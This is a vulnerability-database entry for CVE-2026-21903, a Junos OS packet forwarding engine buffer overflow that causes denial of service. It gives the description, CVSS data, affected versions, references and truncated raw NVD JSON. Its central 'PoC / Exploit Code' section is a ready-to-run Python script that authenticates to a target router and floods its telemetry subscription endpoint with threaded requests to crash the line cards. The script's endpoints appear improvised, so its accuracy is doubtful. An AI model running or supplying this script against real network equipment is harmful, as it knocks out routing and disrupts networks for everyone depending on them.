CVE-2026-21903

Description

A Stack-based Buffer Overflow vulnerability in the Packet Forwarding Engine (pfe) of Juniper Networks Junos OS allows a network-based attacker, authenticated with low privileges to cause a Denial-of-Service (DoS). Subscribing to telemetry sensors at scale causes all FPC connections to drop, resulting in an FPC crash and restart. The issue was not seen when YANG packages for the specific sensors were installed. This issue affects Junos OS: * all versions before 22.4R3-S7, * 23.2 version before 23.2R2-S4, * 23.4 versions before 23.4R2.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:22.4:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:22.4:r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:22.4:r1-s1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:22.4:r1-s2:*:*:*:*:*:* - VULNERABLE

Junos OS 22.4R3-S7之前的所有版本

Junos OS 23.2R2-S4之前的23.2版本

Junos OS 23.4R2之前的23.4版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2026-21903 PoC - Juniper Junos OS PFE Telemetry Buffer Overflow
# Authenticated low-privilege user can trigger DoS via mass telemetry subscription

import requests
import concurrent.futures
import argparse

def exploit_juniper(target_ip, username, password, num_threads=50):
    """Exploit CVE-2026-21903 by sending mass telemetry subscription requests"""
    
    # Step 1: Authenticate with low-privilege account
    auth_url = f"https://{target_ip}/rpc/login"
    auth_data = {
        "user": username,
        "password": password
    }
    
    session = requests.Session()
    try:
        auth_response = session.post(auth_url, json=auth_data, verify=False, timeout=30)
        if auth_response.status_code != 200:
            print(f"[-] Authentication failed")
            return False
        print(f"[+] Authenticated successfully")
    except Exception as e:
        print(f"[-] Connection error: {e}")
        return False
    
    # Step 2: Define telemetry sensor subscription payload
    telemetry_sensors = [
        "junos/system/line-card/interface/",
        "junos/system/line-card/firewall/",
        "junos/system/line-card/forwarding/",
        "junos/packet/forwarding-engine/",
        "junos/hardware/resource/",
        "junos/network/control-plane/"
    ]
    
    def send_telemetry_request(sensor_path):
        """Send telemetry subscription request - triggers buffer overflow at scale"""
        subscribe_url = f"https://{target_ip}/rpc/telemetry/subscribe"
        payload = {
            "sensor-name": sensor_path,
            "stream-method": "stream",
            "format": "json",
            "sample-frequency": 1000
        }
        try:
            response = session.post(subscribe_url, json=payload, verify=False, timeout=10)
            return response.status_code
        except:
            return None
    
    # Step 3: Send mass subscription requests to trigger buffer overflow
    print(f"[*] Sending mass telemetry subscriptions (this will trigger FPC crash)...")
    
    with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
        # Repeat sensor subscriptions to maximize buffer pressure
        for iteration in range(100):
            futures = [executor.submit(send_telemetry_request, sensor) 
                      for sensor in telemetry_sensors * 20]
            concurrent.futures.wait(futures)
    
    print(f"[+] Exploit completed - FPC should crash and restart")
    return True

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2026-21903 PoC")
    parser.add_argument("-t", "--target", required=True, help="Target Juniper device IP")
    parser.add_argument("-u", "--username", required=True, help="Low-privilege username")
    parser.add_argument("-p", "--password", required=True, help="Password")
    args = parser.parse_args()
    
    exploit_juniper(args.target, args.username, args.password)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21903
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21903
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21903/
[4] VulDB https://vuldb.com/cve/CVE-2026-21903
[5] https://kb.juniper.net/JSA106022
[6] https://supportportal.juniper.net/JSA106022

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21903", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:05.807", "lastModified": "2026-01-23T19:40:03.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stack-based Buffer Overflow vulnerability in the Packet Forwarding Engine (pfe) of Juniper Networks Junos OS allows a network-based attacker, authenticated with low privileges to cause a Denial-of-Service (DoS).\n\n\n\nSubscribing to telemetry sensors at scale causes all FPC connections to drop, resulting in an FPC crash and restart.\nThe issue was not seen when YANG packages for the specific sensors were installed. \n\n\n\nThis issue affects Junos OS: \n\n\n\n * all versions before 22.4R3-S7,\n * 23.2 version before 23.2R2-S4,\n * 23.4 versions before 23.4R2."}, {"lang": "es", "value": "Una vulnerabilidad de desbordamiento de búfer basado en pila en el Motor de Reenvío de Paquetes (pfe) de Juniper Networks Junos OS permite a un atacante basado en red, autenticado con privilegios bajos, causar una Denegación de Servicio (DoS).\n\nLa suscripción a sensores de telemetría a escala provoca la caída de todas las conexiones FPC, lo que resulta en un fallo y reinicio de la FPC.\nEl problema no se observó cuando se instalaron los paquetes YANG para los sensores específicos.\n\nEste problema afecta a Junos OS:\n\n* todas las versiones anteriores a 22.4R3-S7,\n* versión 23.2 anterior a 23.2R2-S4,\n* versiones 23.4 anteriores a 23.4R2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*", "versionEndExcluding": "22.4", "matchCriteriaId": "57F66641-003B-49D6-A9B9-AB300CFE3C93"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:-:*:*:*:*:*:*", "matchCriteriaId": "1379EF30-AF04-4F98-8328-52A631F24737"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1:*:*:*:*:*:*", "matchCriteriaId": "28E42A41-7965-456B-B0AF-9D3229CE4D4C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "CB1A77D6-D3AD-481B-979C-8F778530B175"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "3A064B6B-A99B-4D8D-A62D-B00C7870BC30"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r2:*:*:*:*:*:*", "matchCriteriaId": "40813417-A938-4F74-A419-8C5188A35486"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "7FC1BA1A-DF0E-4B15-86BA-24C60E546732"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "EBB967BF-3495-476D-839A-9DBFCBE69F91"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r3:*:*:*:*:*:*", "matchCriteriaId": "7E5688D6-D ... (truncated)